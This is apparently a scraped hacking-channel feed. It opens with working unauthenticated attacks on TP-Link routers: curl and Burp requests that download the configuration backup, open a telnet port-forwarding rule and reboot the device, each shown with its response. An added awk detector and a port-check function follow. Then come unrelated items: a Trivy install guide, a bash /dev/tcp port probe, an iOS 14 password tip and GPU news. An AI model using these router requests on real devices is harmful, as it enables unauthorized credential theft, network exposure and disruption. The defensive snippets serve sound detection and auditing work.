Forwarded from UNDERCODE NEWS
Evil actions without authentication, example (also in TP-Link routers):
A) Burp request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
[binary response body skipped]
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' \
  -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
  -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' \
  -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' \
  $'http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: Mozilla/Agent22" \
  -H 'Accept: */*' -H "Referer: http://192.168.0.1/mainFrame.htm" \
  --data-binary $'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP or UDP\x0d\x0aopenProtocol=TCP or UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' \
  http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Description -----
enable=0 means disabled
enable=1 means enabled
You can also change the port.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: Mozilla/Agent22" \
  -H 'Accept: */*' -H "Referer: http://192.168.0.1/mainFrame.htm" \
  --data-binary $'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' \
  http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
---- Description -----
error = 0 means the reboot succeeded
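From the defender's side, the requests above share a recognizable shape: a hit on /cgi/conf.bin, or a POST to /cgi?N whose body starts with a bracketed action name, sent with no session credential. The following is an added example, not part of the original post: a shell/awk filter over captured HTTP requests that flags that shape. The capture layout (requests separated by a line of ----), the sample requests, and treating a Cookie or Authorization header as evidence of a session are assumptions made for the example.

```bash
#!/bin/sh
# Added example: flag router CGI requests that carry no session credential.
# Input (stdin): raw HTTP requests, each followed by a line holding only "----".
# Output: METHOD URI ACTION per flagged request ("-" when there is no action body).
flag_unauth_cgi() {
  tr -d '\r' | awk '
    function emit() {
      sensitive = (uri ~ /^\/cgi\/conf\.bin/) || (method == "POST" && uri ~ /^\/cgi\?[0-9]+$/)
      if (method != "" && sensitive && !auth)
        print method, uri, (action == "" ? "-" : action)
      method = ""; uri = ""; action = ""; auth = 0
    }
    /^----$/ { emit(); next }
    method == "" && NF >= 2 { method = $1; uri = $2; next }
    method == "" { next }
    # Assumption: an authenticated browser sends Cookie or Authorization.
    tolower($0) ~ /^(cookie|authorization):/ { auth = 1 }
    # A body line such as [ACT_REBOOT#0,0,...] names the requested action.
    match($0, /^\[[A-Z_]+#/) { action = substr($0, 2, RLENGTH - 2) }
    END { emit() }
  '
}

# Constructed sample capture (not real traffic); the cookie value is made up.
sample_capture() {
  cat <<'EOF'
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
Referer: http://192.168.0.1/mainFrame.htm
----
POST /cgi?7 HTTP/1.1
Referer: http://192.168.0.1/mainFrame.htm

[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0
----
POST /cgi?7 HTTP/1.1
Cookie: session=constructed

[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0
----
GET /mainFrame.htm HTTP/1.1
----
EOF
}

sample_capture | flag_unauth_cgi
```

On the sample, the config download and the first reboot request are flagged; the reboot request that carries a cookie and the ordinary page load are not.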
Trivy: another good Linux tool
Discovery of complex vulnerabilities
Simplicity - Specify only the name of the image or the name of the artifact.
Fast - The first scan completes within 10 seconds (depending on your network). Follow-up scans complete in seconds.
DevSecOps - Suitable for CIs like Travis CI, CircleCI, Jenkins, GitLab CI, etc.
Support for multiple formats - including container images, local file systems and remote git repositories.
Easy installation - it can be installed with apt-get, yum and brew, without prerequisites such as installing a database or libraries.
How to use the Trivy image scanner
Trivy can be installed on a number of Linux distributions as well as macOS.
INSTALLATION & RUN:
1) sudo apt-get install wget apt-transport-https gnupg lsb-release
2) wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | sudo apt-key add -
echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | sudo tee /etc/apt/sources.list.d/trivy.list
3) After adding the Trivy repository, update the server and install the trivy package as follows:
4) sudo apt-get update
5) sudo apt-get install trivy
Forwarded from UNDERCODE NEWS
I'm amazed at the Xbox Series X, which is full of contents, usually a power supply unit with a "design you want to avoid"
#Technologies
How to know if a remote port is open using network redirection:
A) Find out if a remote port is open using network redirection with bash!
Check if port 22/TCP is open at 127.0.0.1.
$ PROTO="tcp"; DST_ADDR="127.0.0.1"; DST_PORT=22; (</dev/${PROTO}/${DST_ADDR}/${DST_PORT} && STATUS="OPEN" || STATUS="CLOSED OR UNAVAILABLE"; echo Port ${DST_PORT}/${PROTO^^} on ${DST_ADDR} is ${STATUS}) 2>/dev/null
Port 22/TCP on 127.0.0.1 is OPEN
B) It's open, so let's read from the TCP socket using bash again:
$ timeout 1 cat </dev/tcp/127.0.0.1/22
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
Find out if port 53/UDP is open on 10.1.0.1.
$ PROTO="udp"; DST_ADDR="10.1.0.1"; DST_PORT=53; (</dev/${PROTO}/${DST_ADDR}/${DST_PORT} && STATUS="OPEN" || STATUS="CLOSED OR UNAVAILABLE"; echo Port ${DST_PORT}/${PROTO^^} on ${DST_ADDR} is ${STATUS}) 2>/dev/null
Port 53/UDP on 10.1.0.1 is CLOSED OR UNAVAILABLE
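The one-liner above waits as long as the kernel does when a firewall silently drops the connection attempt. As an added example (not part of the original post), here is the same /dev/tcp check wrapped in a function with a hard timeout, input validation and three distinct results, for auditing the exposure of your own hosts; the function names and the 2-second default are choices made for the example.

```bash
#!/bin/sh
# Added example: classify a TCP port as open, closed or filtered with bash's
# /dev/tcp redirection, under a hard timeout so a filtered port cannot hang.

# port_state HOST PORT [SECONDS]: prints open|closed|filtered|invalid,
# returns 0|1|2|64.
port_state() {
  ps_host=$1 ps_port=$2 ps_wait=${3:-2}
  # Allow only hostname/IP characters and a decimal port in 1..65535.
  case $ps_host in ''|*[!A-Za-z0-9._:-]*) echo invalid; return 64 ;; esac
  case $ps_port in ''|*[!0-9]*|??????*) echo invalid; return 64 ;; esac
  if [ "$ps_port" -lt 1 ] || [ "$ps_port" -gt 65535 ]; then echo invalid; return 64; fi
  # Host and port are passed as positional arguments, never spliced into code.
  if timeout "$ps_wait" bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$ps_host" "$ps_port" 2>/dev/null
  then ps_rc=0; else ps_rc=$?; fi
  case $ps_rc in
    0)   echo open;     return 0 ;;
    124) echo filtered; return 2 ;;  # timeout(1) gave up: nothing answered
    *)   echo closed;   return 1 ;;  # refused or unreachable
  esac
}

# audit_ports HOST PORT...: one line per port, for checking your own exposure.
audit_ports() {
  ap_host=$1; shift
  for ap_port in "$@"; do
    printf '%s/tcp on %s is %s\n' "$ap_port" "$ap_host" "$(port_state "$ap_host" "$ap_port" 2)"
  done
}

audit_ports 127.0.0.1 22 80
```

The example is TCP only: a UDP redirection has no handshake to observe, so its success or failure says little about whether a service is listening.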
Security tip for iOS 14
How password monitoring works in iOS 14 to protect against hacks:
1) Most people live online these days, so they have hundreds of logins and passwords for accounts on different sites and services. In that situation a password manager is a vital necessity. iPhones have a built-in manager. In iOS 14 it has become even more useful, as it regularly checks whether your passwords have appeared in data leaks on the Internet.
Apple's iCloud Keychain password manager could already warn about weak passwords and about passwords reused across accounts. Previously, there was no check of passwords against cracked ones.
2) If a password is found in a data breach, this does not mean that your account has been compromised. The leak could have come from another site or from data stolen from the company as a whole, not necessarily from the exact site you are using. Even so, however complex your passwords are, hackers regularly add leaked passwords to brute-force lists. It is only a matter of time before you become a target and your account can be hacked.
3) Monitoring passwords in Safari
If iCloud Keychain is configured to automatically enter passwords in mobile apps and web apps, Safari will alert you to cracked passwords when you visit the site. If you use iCloud Keychain to automatically enter logins and passwords on sites in this browser, then after you log in the browser will warn you that the password on the site needs to be changed:
"This password appeared in a data breach, which increases the risk of this account being compromised. You must change your password immediately."
"The iPhone can create a complex password for you. Do you want to change the password for [site name]?"
Forwarded from UNDERCODE NEWS
Nvidia responds to serious shortage of RTX3070/3080: temporarily unable to do anything.
#international